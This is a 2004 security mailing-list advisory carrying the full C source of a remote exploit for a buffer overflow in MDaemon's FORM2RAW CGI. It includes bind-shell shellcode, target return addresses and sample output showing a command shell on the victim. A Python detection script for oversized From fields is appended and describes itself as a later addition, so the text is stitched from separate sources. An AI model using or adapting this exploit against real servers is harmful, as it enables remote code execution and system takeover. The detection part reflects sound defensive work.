[EXPL] Remote Buffer Overflow in MDaemon (Exploit)

From: SecuriTeam (support_at_securiteam.com)
Date: 03/16/04

To: list@securiteam.com
Date: 16 Mar 2004 13:06:00 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      Remote Buffer Overflow in MDaemon (Exploit)
    ------------------------------------------------------------------------

    SUMMARY

    As we reported in our previous article,
    <http://www.securiteam.com/windowsntfocus/5ZP050ABPY.html> Remote Buffer
    Overflow in MDaemon (Raw Message Handler), a vulnerability in MDaemon
    allows remote attackers to overflow an internal stack buffer and overwrite
    the saved EIP, thus allowing the attacker to make the program execute
    arbitrary code.

    DETAILS

    Exploit:
    /*
            Copyright (c) Rosiello Security
            http://www.rosiello.org
             ================

     <rave> ____________
     <rave> _.-----------------------/ `-,,
     <rave> ,' ; ; / `-._
     <rave> ; ; ; .') \ `\
     <rave> `--------------------.'.' _.-'`- . `\
     <rave> ;`---'-------.\, `\ _
     <rave> ;, ; .---`, ` -
     <rave> ;` ; `.____;
     <rave> `--------------'_ ,,
     <rave> ,; ; .---`, ` ._
     <rave> ;; ; `.____; ___``````
     <rave> `;--------------' `
     <rave> ,; ; .---`,
     <rave> ;; ; `.____;
     <rave> `.------------'
     <rave> ``----...__ _..=
     <rave> `````---=-.---``'`
              _
          | |_
        |_ _|
          |_|

         /\ \ We /\ \ are /\ \
          /::\ \ Black /::\ \ H@t \:\ \
         /:/\:\ \ /:/\:\ \ \:\ \
        _::\~\:\ \ _::\~\:\ \ /::\ \
       /\ \:\ \:\__\ /\ \:\ \:\__\ /:/\:\__\
       \:\ \:\ \/__/ \:\ \:\ \/__/ /:/ \/__/
        \:\ \:\__\ \:\ \:\__\ /:/ /
         \:\/:/ / \:\/:/ / /:/ /
          \::/ / \::/ / /:/ /
           \/__/ \/__/ \/__/ airsupply@0x557.org
                                          http://www.0x557.org
        ================

    --== Remote Exploit for Mdaemon version v6.85 and prior to 6.52 ==--
     Code by: rave
     Contact: rave@rosiello.org
     Contact: airsupply@0x557.org
     Date: March 2004

     Bug found by: hat-squad security ( great job !! )

        MDaemon offers a full range of mail server functionality. "MDaemon protects your users from
     spam and viruses, provides full security, includes seamless web access to your email via
     WorldClient, remote administration, and much more!". FORM2RAW.exe is a CGI that allows users
     to send emails using MDaemon via a web page. It processes the fields of an HTML form and
     creates a raw message file in the raw queue directory of the MDaemon mail server. This file
     is then processed and queued for delivery by MDaemon. An attacker can cause a buffer overflow
     in MDaemon by issuing a malformed CGI request to FORM2RAW.exe.

       According to the Help file: "By default, MDaemon 6.52 or higher will not send emails created by
     Form2Raw unless the email address passed in the 'from' tag (see below) is a valid account on the
     MDaemon server. If you want to disable this behavior you can set FromCheck=No in the FORM2RAW.INI
     file".

        Sending more than 153 bytes in the "From" field to FORM2RAW.exe creates a raw file that, when
     processed by MDaemon, will cause a stack buffer overflow. The EIP register is overwritten when
     the From field length is 249 bytes.

     Do i need to say more ? this is 0wnage 0ldsch00l style have fun..
     This spawns a waiting bindshell on the victim's computer at port 58821..

     ps:
     The exploit has only been tested on Windows XP Home and Pro edition (Dutch) SP1, and the stack
     has proven to be very humpy. So please don't yell at me if the exploit doesn't work on your
     operating system .. thanks

     The demo mode of the exploit shows the following in the debugger:
     EAX = 00000000 EBX = 00000000 ECX = 014D1BD8 EDX = 01090000 ESI = 014C6000 EDI = 01AEF1A8
     EIP = 42424242 ESP = 01AEEEE8 EBP = 0005E668

     Note:Demo mode works on all operative systems

     Usage: <C:\Mdeamon>Mdeamon_exp.exe <target host> <target number>
     Target Number   Target Name            Stack Address
     =============   ===========            =============
     0               Demo                   0x42424242
     1               Windows XP HOME [NL]   0x014D4DFC
     2               Windows XP PRO [NL]    0x014D4DFC

     <C:\Mdeamon> Mdeamon_exp localhost 1
     [+] Winsock Inalized
     [+] Trying to connect to localhost:3000
     [+] socket inalized
     [+] Overflowing string is Prepared
     [+] Connected
     [+] Overflowing string had been send

     <C:\> telnet localhost 58821
     Microsoft Windows XP [versie 5.1.2600]
     C) Copyright 1985-2001 Microsoft Corp.

     D:\MDaemon\APP>

     Special Thanks to:
     airsuppy { 0x557 security r0cked me, ty for ur part and cooperation bro }
     Silicon { Unofficial sources told me ur a rosiello member, good, i lent ur
    bindcode TY 100% }
     Sam { once again 0x557 ty for the chat although it was a short one }
     Dragnet { Always willing to help me out }
     Angelo { Very very good friend }
     Punix { Last time i forgot you girl ! :( im so sorry }

     Greetz go out to:
     NrAziz { This is my brother anyone who touches him touches me, so pls
    make my day ! }
     sloth { good guy }
     Mercy { Hope to see u soon }
     Netric security { www.netric.org/.be }
     0x557 security (SST) { www.0x557.org }
     [+] All the hax0rs i forgot.

     This was rosiello's first cooperation with the 0x557 ppl, which have been proven to be
     really nice. In the past rosiello has worked with (now dead) DSR, also known as dtors
     security research, but (and it's a personal wish) i hope that 0x557 will still be so nice for
     us. I feel myself called to give a great big shoutout to these ppl for their work for now and
     in the future !! keep on doing the great job !.

      Bad sounds of these days {
      i can't remember anything, can't tell if this is true or a dream. deep down down inside me i
      feel the stream, this terrible silence stops with me. Now that the war is through with me i'm
      waking up, i can not see that there is nothing left of me, nothing is real but pain now.
      }

    The original advisory can be found at:
    http://hat-squad.com/bugreport/mdaemon-raw.txt
    The mirrored advisory can be found at:
    http://www.securiteam.com/windowsntfocus/5ZP050ABPY.htm
    Our own advisory can be found at:
    http://www.rosiello.org/en/read_bugs.php?17

     !!!DO NOT USE THIS CODE ON DIFFERENT MACHINES BUT YOURS!!!
     Respect the law as we do!

    I'm outa here bye bye !
    */

    #include <stdio.h>
    #include <stdlib.h>   /* exit(), atoi() */
    #include <string.h>   /* strlen(), memcpy() */
    #include <winsock2.h>
    #include <errno.h>
    #include <windows.h>

    // Darn fucking 1337 macro ***
    #define ISIP(m) (!(inet_addr(m) ==-1))

    #define offset 267 //;267 //1024

    // hmm :D
    #define NOPS "\x90\x90\x90\x90\x90\x90\x90"

     struct sh_fix
    {
     unsigned long _wsasock;
     unsigned long _bind;
     unsigned long _listen;
     unsigned long _accept;
     unsigned long _stdhandle;
     unsigned long _system;
    } ;

    struct remote_targets {
      char *os;
      unsigned long sh_addr;
      struct sh_fix _sh_fix;
    } target [] ={
    /* Option`s for your eyes only :D*/
        "Demo ",
         0x42424242,
        { 0x90909090,
          0x90909090,
          0x90909090,
          0x90909090,
          0x90909090,// <--
          0x90909090,
        },

        "Windows XP HOME [NL]",
         0x014D4DFC,
        { 0x71a35a01,
          0x71a33ece,
          0x71a35de2,
          0x71a3868d,
          0x77e6191d,// <--
          0x77bf8044,
        },

        "Windows XP PRO [NL]",
         0x014D4DFC,
        { 0x71a35a01,
          0x71a33ece,
          0x71a35de2,
          0x71a3868d,
          0x77e6191d,// <--
          0x77bf8044,
        }
    };

    unsigned char _addy [] =
    "\x90\x90\x90\x90";

    // 116 bytes bindcode for windows,(NTlike) port=58821, by silicon :)
    // w000w you rule !!
    unsigned char shellcode[] =

    "\x83\xC4\xEC\x33\xC0\x50\x50\x50\x6A\x06"
    "\x6A\x01\x6A\x02\xB8"
    "\xAA\xAA\xAA\xAA"
    "\xFF\xD0\x8B\xD8\x33\xC0\x89\x45\xF4\xB0"
    "\x02\x66\x89\x45\xF0\x66\xC7\x45\xF2\xE5"
    "\xC5\x6A\x10\x8D\x55\xF0\x52\x53\xB8"
    "\xBB\xBB\xBB\xBB"
    "\xFF\xD0\x6A\x01\x53\xB8"
    "\xCC\xCC\xCC\xCC"
    "\xFF\xD0\x33\xC0\x50\x50\x53\xB8"
    "\xDD\xDD\xDD\xDD"
    "\xFF\xD0\x8B\xD8\xBA"
    "\xEE\xEE\xEE\xEE"
    "\x53\x6A\xF6\xFF\xD2\x53\x6A\xF5\xFF\xD2"
    "\x53\x6A\xF4\xFF\xD2\xC7\x45\xFB\x41\x63"
    "\x6D\x64\x8D\x45\xFC\x50\xB8"
    "\xFF\xFF\xFF\xFF"
    "\xFF\xD0\x41";

    /* The funny thing is while exploiting this bug one of the addresses
       (see target[1 || 2].sh_addr) had a forbidden character (0x20 aka space). To fix this i wrote
       this addy/mini shellcode to replace the 0x19 (that's not supposed to be there) in the
       SetStdHandle () address inside the shellcode with an 0x20.
       */

    unsigned char _me [] =
    "\x33\xC9" // xor ecx,ecx
    "\xBE\xAA\xAA\xAA\xAA" // mov esi,offset _shellcode (00421a50)
    "\x83\xC1\x1F" // add ecx,1Fh
    "\x41" // inc ecx
    "\x66\x89\x4E\x50" // mov word ptr [esi+50h],cx
    "\xC6\x46\x51\xE6"; // mov byte ptr [esi+51h],0E6h

    // now what would this button do ?
    char *host_ip;
    /* Resolve a host name to a dotted-quad string; main() feeds the result to inet_addr().
       Returning a string in both branches keeps the two call paths consistent. */
    char *get_ip(char *hostname)
    {
     struct hostent *hp;

     /* already a dotted quad: hand it back untouched */
     if (ISIP(hostname)) return hostname;

      if ((hp = gethostbyname(hostname))==NULL)
      { perror ("[+] gethostbyname() failed check the existance of the host.\n");
        exit(-1); }

      return inet_ntoa(*((struct in_addr *)hp->h_addr));
    }

    int fix_shellcode ( int choise )
    {
     unsigned long only_xp =target[choise].sh_addr+strlen(NOPS)+strlen(_me);

      memcpy(_me+3,((char *)&only_xp),4);

      //0xf offset to the adres of WSASocketA
      memcpy(shellcode+0xf,((char *)&target[choise]._sh_fix._wsasock),4);

      //0x30 offset to the adres of bind
      memcpy(shellcode+0x30,((char *)&target[choise]._sh_fix._bind),4);

      //0x3a offset to the adres of listen
      memcpy(shellcode+0x3a,((char *)&target[choise]._sh_fix._listen),4);

      //0x46 offset to the adres of _accept
      memcpy(shellcode+0x46,((char *)&target[choise]._sh_fix._accept),4);

      //0x4f offset to the adres of SetStdHandle
      memcpy(shellcode+0x4f,((char *)&target[choise]._sh_fix._stdhandle),4);

      //0x6e offset to the adres of SYSTEM
      memcpy(shellcode+0x6e,((char *)&target[choise]._sh_fix._system),4);

    return 0;

    }
    /// oooh yeah uuuh right .... Crap dont you uuh yeah at me you know me !
    int usage (char *what)
    {
     int i;

      fprintf(stdout,"Copyright (c) Rosiello Security\n");
      fprintf(stdout,"http://www.rosiello.org\n\n");
      fprintf(stdout,"Usage %s <target host> <target number>\n",what);
      fprintf(stdout,"Target Number\t\tTarget Name\t\t\t\tStack Adress\n");
      fprintf(stdout,"=============\t\t===========\t\t\t\t===========\n");

      /* sh_addr is an unsigned long, so print it with %lx rather than %p */
      for (i=0;i < 3;i++)
        fprintf(stdout,"%d\t\t\t%s\t\t0x%08lx\n",i,target[i].os,target[i].sh_addr);

      exit(0);
    }

    int main(int argc,char **argv)
    {
     char buffer[offset*4]="get /form2raw.cgi?From=",*ptr,*address;
     int sd,oops,i,choise;
     struct sockaddr_in ooh;

     WSADATA wsadata;
     WSAStartup(0x101, &wsadata);

     /* both the host and the target number are required (argv[2] is read below) */
     if (argc < 3) usage(argv[0]);
     address=argv[1];
     choise=atoi(argv[2]);
     /* only targets 0..2 exist in the table above */
     if (choise < 0 || choise > 2) usage(argv[0]);
     fix_shellcode(choise);

     fprintf(stdout,"[+] Winsock Inalized\n");

      /* Lets start making a litle setup
        Change the port if you have to */

      ooh.sin_addr.s_addr = inet_addr(get_ip(address));
        ooh.sin_port = htons(3000);
        ooh.sin_family = AF_INET;

     fprintf(stdout,"[+] Trying to connect to %s:%d\n",address,3000);

     // ok ok here`s ur sock()
     sd = socket(AF_INET, SOCK_STREAM,IPPROTO_TCP);
      /* socket() reports failure with INVALID_SOCKET, not a negative value */
      if (sd == INVALID_SOCKET) { fprintf(stderr,"[!] socket() failed.\n");exit (-1); }

      fprintf(stdout,"[+] socket inalized\n");

      /* initializing the exploiting buffer, read the file comments for the details */
     ptr=buffer+strlen(buffer);

     for (i=strlen(buffer);i < offset;i++) *ptr++=(char)0x40;

     sprintf(buffer+strlen(buffer),"%s%s&To=airsupply@0x557.org&Subject=hi&Body=%s%s%s HTTP/1.0\r\n\r\n",
           ((char *)&target[choise].sh_addr),_addy,NOPS,_me,shellcode);

     //memcpy(buffer+35,shellcode,strlen(shellcode));

     fprintf(stdout,"[+] Overflowing string is Prepared\n");

      // Knock knock ... hi i want to hook up with you
      oops=connect(sd, (struct sockaddr *)&ooh, sizeof( ooh ));
       if(oops!=0) { fprintf(stderr,"[!] connect() failed.\n"); exit(-1); }

     // yep wher`e in :D
     fprintf(stdout,"[+] Connected\n");

     // Sending some Dangerous stuff
     i = send(sd,buffer,strlen(buffer),0);
     /* send() returns SOCKET_ERROR on failure, otherwise the number of bytes sent */
     if (i == SOCKET_ERROR) { fprintf (stdout,"[!] Send() failed\n"); exit (-1) ; }

     fprintf(stdout,"[+] Overflowing string had been send\n");

     // Bring in the cleaners !!
     WSACleanup();

     // [EOF]
     return 0;

    }
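The two lengths in the exploit header (a From field longer than 153 bytes overruns the buffer, 249 bytes reaches the saved EIP) make a useful detection rule for anyone running MDaemon's FORM2RAW CGI. The Python check below is an added example, not part of the advisory or of Rosiello's code: it inspects HTTP request lines for /form2raw.cgi requests whose From field exceeds those lengths. The sample request lines and the use of '@' (the exploit's 0x40 padding byte) as filler are constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Lengths stated in the advisory: more than 153 bytes in the From field already
# overruns the stack buffer; at 249 bytes the saved EIP is overwritten.
OVERFLOW_THRESHOLD = 153
EIP_OVERWRITE_LEN = 249

REQUEST_LINE = re.compile(r"^(\S+)\s+(\S+)\s+HTTP/\d\.\d$", re.IGNORECASE)  # exploit sends "get"

def inspect_request_line(line):
    """Return None for a harmless request line, or a dict describing the problem."""
    m = REQUEST_LINE.match(line.strip())
    if not m:
        return None
    parts = urlsplit(m.group(2))
    if not parts.path.lower().endswith("/form2raw.cgi"):
        return None
    fields = parse_qs(parts.query, keep_blank_values=True)
    # Field name is matched case-insensitively: the docs say 'from', the exploit uses 'From'.
    values = [v for k, vs in fields.items() if k.lower() == "from" for v in vs]
    if not values:
        return None
    raw = [v.encode("latin-1", "replace") for v in values]   # byte length is what matters
    longest = max(len(b) for b in raw)
    if longest <= OVERFLOW_THRESHOLD:
        return None
    return {
        "from_length": longest,
        "eip_reachable": longest >= EIP_OVERWRITE_LEN,
        # bytes outside printable ASCII are typical of a return address or shellcode
        "non_printable": any(b < 0x20 or b > 0x7E for buf in raw for b in buf),
    }

def scan_request_lines(lines):
    """Return (line_number, finding) pairs for every request line that trips the check."""
    hits = []
    for n, line in enumerate(lines, start=1):
        finding = inspect_request_line(line)
        if finding is not None:
            hits.append((n, finding))
    return hits

# Constructed sample request lines (not captured traffic): a normal form post, an unrelated
# request, and one whose From field is padded far past the overflow length.
SAMPLE_LINES = [
    "GET /form2raw.cgi?From=alice@example.com&To=bob@example.com&Subject=hi&Body=hello HTTP/1.0",
    "GET /index.html HTTP/1.0",
    "get /form2raw.cgi?From=" + "@" * 300 + "&To=bob@example.com&Subject=hi&Body=x HTTP/1.0",
]
```

Run `scan_request_lines(SAMPLE_LINES)` to get the offending line numbers; only the third line is reported, with `eip_reachable` set because 300 bytes exceeds the 249-byte EIP distance.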

    ADDITIONAL INFORMATION

    The information has been provided by
    <mailto:angelo.rosiello@katamail.com> Angelo Rosiello.

    The original article can be found at:
    http://www.rosiello.org/archivio/mdaemon-exploit.c

